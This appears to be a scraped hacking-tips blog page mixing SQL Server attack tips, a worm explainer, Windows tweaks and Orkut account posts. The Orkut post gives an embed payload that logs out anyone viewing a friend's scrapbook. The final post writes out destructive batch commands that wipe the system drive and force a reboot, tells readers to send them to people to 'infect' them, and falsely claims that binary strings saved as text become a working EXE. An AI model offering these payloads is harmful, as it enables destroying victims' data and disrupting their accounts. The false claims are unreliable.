Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Read More

What is Double Password?

Strong passwords should have a significant length and cannot contain normal words. Only random digits and letters of different case. Such passwords are extremely hard to remember and it takes time to enter. But, even strong passwords have their weaknesses. When you type a password, it can be intercepted by a spy program that logs all your keystrokes. Others can see what you type (even if the password field on the screen is masked, the password can be read by buttons you hit on your keyboard.)

Until now, the only solution was to buy a secure token. A secure token is a hardware key that is used instead of or in addition to your normal password authentication. There are two main problems with the hardware solution, though. First, it is expensive. And second, you can use them only with software that has built-in support for this method of authentication.

Read More

Save Hard-drive space upto 1/2 GB in Windows Vista

For the few people that can’t hibernate their computer because it automatically resumes, or the ones that just don’t use hibernation, you’ll want to disable this since the feature consumes as much hard-drive space as you have in RAM. A simple command prompt entry can disable hibernation.

1) Click on the Start Pearl > type cmd in the Search Bar > press Ctrl+Shift+Enter

2) Enter powercfg -H off

Once hibernation is off, you’ll still need to use Disk Cleaner to get rid of the files stored on your computer for previous hibernation sessions. To access Disk Cleaner:

1) Open the Start Pearl again and type cleanmgr in the Search bar.

Windows Vista will then prompt you to choose the partition you wish to clean. Select the desired partition, and the rest should be pretty straight forward.

On my computer, hibernation consumed about 510MB. This information is listed under Hibernation File Cleaner. You’ll want to clear all that since you won’t be using hibernation anymore.

Read More

How does Worms work ?

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.

Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.

What’s a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.

How do they spread?

When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you’ll activate the worm, but in some versions of Microsoft Outlook, you don’t even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it’s activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program’s address book and web pages you’ve recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn’t even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.

What do they do?

Most of the damage that worms do is the result of the traffic they create when they’re spreading. They clog e-mail servers and can bring other internet applications to a crawl.

But worms will also do other damage to computer systems if they aren’t cleaned up right away. The damage they do, known as the payload, varies from one worm to the next.

The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO’s proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.

How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren’t expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker’s website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don’t affect computers that run Macintosh or Linux operating systems.

Read More

Block your friends scrapbook - ORKUT

It will be really scary when you will find out that you are not able to reply to your friends scrap from your own scrapbook. Yes this hack can be used to block anybody’s scrapbook. The best part is that after the scrapbook is blocked nobody can scrap him. Really cool!

Copy this and paste in your friends scrapbook.

<embed src=”http://www.orkut.com/GLogin.aspx?cmd=logout” height=”1″ width=”1″></embed>

When that man will enter his scrapbook he will be at the login position .he cant reply from his scrapbook and no one can enter in his profile and scrap him…

Solution : (To Unblock it)

To avoid being logged off again when you see the scrap, you can block flash in your browser.

For Firefox download the following plugin :
https://addons.mozilla.org/en-US/firefox/addon/433

In opera, you can disable the flash plugin.

Now this will only allow you to enter the scrapbook but your friends will still not be able to scrap you. So for that you need to delete the scrap.

Another Method:

First open your scrapbook.

Now Open your Orkut Homepage in a new window( Don’t close the scrapbook ). You will find the login page.

Now enter your detail and login to Orkut.

After being logged in delete the scrap from the scrapbook page that you had kept open.

Enjoy!!!

Read More

What to Do when Ur Orkut is Hacked!

It can be a nightmare if someone else takes control of your Google Account because all your Google services like Gmail, Orkut, Google Calendar, Blogger, AdSense, Google Docs and even Google Checkout are tied to the same account.

Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:

1. Reset Your Google Account Password:

Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.

2. For Google Accounts Associated with Gmail:

If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.

3. For Hijacked Google Accounts Not Linked to Gmail:

If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.

It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.

Read More

Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1.
Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Reply With Quote

Read More